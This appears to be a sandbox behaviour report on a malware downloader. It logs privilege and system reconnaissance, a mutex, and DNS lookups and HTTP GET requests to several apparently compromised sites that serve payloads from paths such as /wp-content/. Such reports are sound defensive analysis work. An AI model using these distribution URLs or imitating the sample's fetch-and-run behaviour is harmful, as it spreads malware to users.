User (11)
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 10
Fn
System (9)
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Network Adapter Info - False 1
Fn
Get Network Adapter Info - True 1
Fn
Mutex (11)
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 5
Fn
Release - True 1
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (127)
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 119
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = userprofile, result_out = C:\Users\aETAdzjz True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (6)
Operation Additional Information Success Count Logfile
Resolve Name host = lesserassociates.com, address_out = 192.115.76.18 True 1
Fn
Resolve Name host = forexproservice.com, address_out = 80.172.234.15 True 1
Fn
Resolve Name host = host-services.com, address_out = 194.8.30.20 True 1
Fn
Resolve Name host = nieuwhoftegelwerken.nl, address_out = 195.8.208.98 True 1
Fn
Resolve Name host = uninortediverso.com, address_out = 104.31.93.251, 104.31.92.251 True 1
Fn
Resolve Name host = vigor-dragon.com, address_out = 47.89.211.238 True 1
Fn
TCP Sessions (1)
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 1
Contacted Hosts 47.89.211.238
TCP Session #1
Information Value
Remote Address 47.89.211.238
Remote Port 443
Local Address 192.168.0.180
Local Port 49171
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 47.89.211.238, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 120, size_out = 120 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 0 True 1
Fn
Close type = SOCK_STREAM True 1
Fn
HTTP Sessions (4)
Information Value
Total Data Sent 324 bytes
Total Data Received 39.00 KB
Contacted Host Count 4
Contacted Hosts 192.115.76.18, 195.8.208.98, 194.8.30.20, 80.172.234.15
HTTP Session #1
Information Value
Server Name lesserassociates.com
Server Port 80
Username -
Password -
Data Sent 85 bytes
Data Received 31.86 KB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = lesserassociates.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/E8h/ True 1
Fn
Send HTTP Request headers = Host: lesserassociates.com, Connection: Keep-Alive, url = lesserassociates.com/wp-content/E8h/ True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 1024, size_out = 1024 True 4
Fn
Data
Read Response size = 582, size_out = 582 True 1
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 6
Fn
Data
Read Response size = 1024, size_out = 1024 True 4
Fn
Data
Read Response size = 1024, size_out = 278 True 1
Fn
Data
Read Response size = 1024, size_out = 1024 True 3
Fn
Data
Read Response size = 746, size_out = 746 True 1
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 6
Fn
Data
Read Response size = 1024, size_out = 1024 True 8
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 6
Fn
Data
Read Response size = 1024, size_out = 554 True 1
Fn
Data
Read Response size = 1024, size_out = 1024 True 6
Fn
Data
Read Response size = 738, size_out = 738 True 1
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 3
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
Information Value
Server Name forexproservice.com
Server Port 80
Username -
Password -
Data Sent 83 bytes
Data Received 499 bytes
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = forexproservice.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/tW/ True 1
Fn
Send HTTP Request headers = Host: forexproservice.com, Connection: Keep-Alive, url = forexproservice.com/wp-content/tW/ True 1
Fn
Data
Read Response size = 4096, size_out = 499 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
Information Value
Server Name host-services.com
Server Port 80
Username -
Password -
Data Sent 77 bytes
Data Received 1.73 KB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = host-services.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /suspended/ True 1
Fn
Send HTTP Request headers = Host: host-services.com, Connection: Keep-Alive, url = host-services.com/suspended/ True 1
Fn
Data
Read Response size = 4096, size_out = 278 True 1
Fn
Data
Read Response size = 1492, size_out = 1492 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
Information Value
Server Name nieuwhoftegelwerken.nl
Server Port 80
Username -
Password -
Data Sent 79 bytes
Data Received 4.92 KB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = nieuwhoftegelwerken.nl, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /g9A/Wj/ True 1
Fn
Send HTTP Request headers = Host: nieuwhoftegelwerken.nl, Connection: Keep-Alive, url = nieuwhoftegelwerken.nl/g9A/Wj/ True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 947, size_out = 947 True 1
Fn
Data
Close Session - True 1
Fn